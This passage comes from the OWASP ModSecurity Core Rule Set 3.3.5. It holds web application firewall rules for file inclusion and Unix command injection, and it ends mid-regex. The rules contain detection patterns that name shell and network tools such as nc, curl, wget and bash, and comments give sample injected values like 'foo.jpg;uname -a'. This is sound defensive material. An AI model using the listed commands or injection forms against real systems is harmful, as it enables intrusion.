block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\ msg:'OS File Access Attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ tag:'PCI/6.5.4',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ Restricted File Access ]=- # # Detects attempts to retrieve application source code, metadata, # credentials and version control history possibly reachable in a web root. # SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ "id:930130,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\ msg:'Restricted File Access Attempt',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-lfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/255/153/126',\ tag:'PCI/6.5.4',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI" modsecurity-crs-3.3.5/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf000066400000000000000000000131701446122515100234500ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # RFI Attacks # # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # -=[ Rule Logic ]=- # These rules look for common types of Remote File Inclusion (RFI) attack methods. # - URL Contains an IP Address # - The PHP "include()" Function # - RFI Data Ends with Question Mark(s) (?) # - RFI Host Doesn't Match Local Host # # -=[ References ]=- # http://projects.webappsec.org/Remote-File-Inclusion # http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html # SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ "id:931100,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?):\/\/" \ "id:931110,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,\ msg:'Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ "id:931120,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rfi',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \ "id:931130,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-rfi',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ tag:'paranoia-level/2',\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ chain" SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ "ctl:auditLogParts=+E,\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI" modsecurity-crs-3.3.5/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf000066400000000000000000001531401446122515100234440ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # [ Unix command injection ] # # This rule detects Unix command injections. # A command injection takes a form such as: # # foo.jpg;uname -a # foo.jpg||uname -a # # The vulnerability exists when an application executes a shell command # without proper input escaping/validation. # # This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: # [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] # # To prevent false positives, we look for a 'starting sequence' that # precedes a command in shell syntax, such as: ; | & $( ` <( >( # Anatomy of the regexp with examples of patterns caught: # # 1. Starting tokens # # ; ;ifconfig # \{ {ifconfig} # \| |ifconfig # \|\| ||ifconfig # & &ifconfig # && &&ifconfig # \n ;\nifconfig # \r ;\rifconfig # \$\( $(ifconfig) # $\(\( $((ifconfig)) # ` `ifconfig` # \${ ${ifconfig} # <\( <( ifconfig ) # >\( >( ifconfig ) # \(\s*\) a() ( ifconfig; ); a # # 2. Command prefixes # # { { ifconfig } # \s*\(\s* ( ifconfig ) # \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ VARNAME=xyz ifconfig # !\s* ! ifconfig # \$ $ifconfig # # 3. Quoting # # ' 'ifconfig' # \" "ifconfig" # # 4. Paths # # [\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc. # # This rule is case-sensitive to prevent FP ("Cat" vs. "cat"). # # An effort was made to combat evasions by shell quoting (e.g. 'ls', # 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine # transformation built-in to deal with this, but unfortunately, it # replaces ';' characters and lowercases the payload, which is less # useful for this case. However, emulating the transformation makes # the regexp more complex. # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* # [regexp assembled from util/regexp-assemble/regexp-932100.txt] # \b" \ # # This is the base Rule to prevent Unix Command Injection # Please refer other rules 932105,932106 to know more. # # .932100 # ├── 932105 # ├── 932106 # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:w[\\\\'\"]*p[\\\\'\"]*-[\\\\'\"]*(?:d[\\\\'\"]*(?:o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*m[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*q[\\\\'\"]*u[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|m[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*r)|s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|h[\\\\'\"]*w|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m|(?:\s|<|>).*)|o[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*(?:t[\\\\'\"]*e|l)[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|d[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|(?:[np]|y[\\\\'\"]*n[\\\\'\"]*x)[\\\\'\"]*(?:\s|<|>).*)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p[\\\\'\"]*2)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*h)|r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*k[\\\\'\"]*s[\\\\'\"]*w|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*(?:p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|h[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*(?:\s|<|>).*|f[\\\\'\"]*l[\\\\'\"]*a[\\\\'\"]*g[\\\\'\"]*s|a[\\\\'\"]*t[\\\\'\"]*t[\\\\'\"]*r|m[\\\\'\"]*o[\\\\'\"]*d)|r[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*b|(?:[cp]|a[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h)|f[\\\\'\"]*(?:i(?:[\\\\'\"]*(?:l[\\\\'\"]*e[\\\\'\"]*(?:t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|(?:\s|<|>).*)|n[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*))?|t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|u[\\\\'\"]*n[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n|(?:e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|c)[\\\\'\"]*(?:\s|<|>).*|o[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|e[\\\\'\"]*(?:n[\\\\'\"]*(?:v(?:[\\\\'\"]*-[\\\\'\"]*u[\\\\'\"]*p[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)?|d[\\\\'\"]*(?:i[\\\\'\"]*f|s[\\\\'\"]*w))|x[\\\\'\"]*(?:p[\\\\'\"]*(?:a[\\\\'\"]*n[\\\\'\"]*d|o[\\\\'\"]*r[\\\\'\"]*t|r)|e[\\\\'\"]*c[\\\\'\"]*(?:\s|<|>).*)|c[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|s[\\\\'\"]*a[\\\\'\"]*c|v[\\\\'\"]*a[\\\\'\"]*l)|h[\\\\'\"]*(?:t[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|p[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|o[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e|i[\\\\'\"]*d)|(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)[\\\\'\"]*(?:\s|<|>).*|i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*y)|i[\\\\'\"]*(?:p[\\\\'\"]*(?:(?:6[\\\\'\"]*)?t[\\\\'\"]*a[\\\\'\"]*b[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*s|c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g)|r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|f[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|g[\\\\'\"]*(?:(?:e[\\\\'\"]*t[\\\\'\"]*f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c|i[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|u[\\\\'\"]*n[\\\\'\"]*z[\\\\'\"]*i[\\\\'\"]*p|d[\\\\'\"]*b)|a[\\\\'\"]*(?:(?:l[\\\\'\"]*i[\\\\'\"]*a[\\\\'\"]*s|w[\\\\'\"]*k)[\\\\'\"]*(?:\s|<|>).*|d[\\\\'\"]*d[\\\\'\"]*u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r|p[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t|r[\\\\'\"]*(?:c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|d[\\\\'\"]*(?:h[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*i[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*t|(?:i[\\\\'\"]*f[\\\\'\"]*f|u)[\\\\'\"]*(?:\s|<|>).*|(?:m[\\\\'\"]*e[\\\\'\"]*s|p[\\\\'\"]*k)[\\\\'\"]*g|o[\\\\'\"]*(?:a[\\\\'\"]*s|n[\\\\'\"]*e)|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:k[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*r|o[\\\\'\"]*r[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*(?:x[\\\\'\"]*(?:\s|<|>).*|q)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)|j[\\\\'\"]*(?:(?:a[\\\\'\"]*v[\\\\'\"]*a|o[\\\\'\"]*b[\\\\'\"]*s)[\\\\'\"]*(?:\s|<|>).*|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c)|k[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*l[\\\\'\"]*(?:a[\\\\'\"]*l[\\\\'\"]*l|(?:\s|<|>).*)|(?:G[\\\\'\"]*E[\\\\'\"]*T[\\\\'\"]*(?:\s|<|>)|\.\s).*|7[\\\\'\"]*z(?:[\\\\'\"]*[ar])?)\b" \ "id:932100,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Unix Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Apache 2.2 requires configuration file lines to be under 8kB. # Therefore, some remaining commands have been split off to a separate rule. # For explanation of this rule, see rule 932100. # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* # [regexp assembled from util/regexp-assemble/regexp-932105.txt] # \b" \ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:(?:f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*)?(?:\s|<|>).*|e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d[\\\\'\"]*(?:\s|<|>).*)|h[\\\\'\"]*(?:\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b|u[\\\\'\"]*t[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n|(?:\s|<|>).*)|o[\\\\'\"]*(?:(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|r[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|c[\\\\'\"]*a[\\\\'\"]*t)|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p[\\\\'\"]*(?:\s|<|>).*)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|(?:l[\\\\'\"]*e[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|u[\\\\'\"]*(?:(?:\s|<|>).*|d[\\\\'\"]*o)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:k[\\\\'\"]*(?:g(?:(?:[\\\\'\"]*_)?[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*o)?|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|f[\\\\'\"]*(?:\s|<|>).*)|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|e[\\\\'\"]*r[\\\\'\"]*(?:l(?:[\\\\'\"]*(?:s[\\\\'\"]*h|5))?|m[\\\\'\"]*s)|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|(?:u[\\\\'\"]*s[\\\\'\"]*h|o[\\\\'\"]*p)[\\\\'\"]*d|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*(?:\s|<|>).*)|n[\\\\'\"]*(?:c[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|(?:\s|<|>).*|a[\\\\'\"]*t)|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t|(?:\s|<|>).*)|s[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"